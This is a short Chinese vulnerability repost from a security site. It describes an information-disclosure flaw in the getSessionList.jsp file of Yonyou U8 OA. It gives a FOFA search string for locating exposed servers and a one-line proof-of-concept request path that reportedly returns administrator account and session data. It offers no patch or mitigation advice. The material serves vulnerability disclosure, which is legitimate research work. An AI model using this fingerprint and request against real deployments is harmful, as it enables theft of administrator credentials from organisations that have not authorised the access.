用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

2023年7月5日14:03:34评论70 views字数 223阅读0分44秒阅读模式

Tips：用友OA产品漏洞_10

- 漏洞描述 -

用友 U8 OA getSessionList.jsp文件，通过漏洞攻击者可以获取数据库中管理员的账户信息。

- 影响范围 -

用友 U8

- FOFA -

"用友U8-OA"

- 漏洞复现 -

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

POC

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

‍

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

end

原文始发于微信公众号（安全攻防渗透）：知识分享17：用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

本文由 admin 发表于 2023年7月5日14:03:34
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞https://cn-sec.com/archives/1852450.html

使用 SeImpersonateToken 权限从 NT 服务到 SYSTEM 的反射 DLL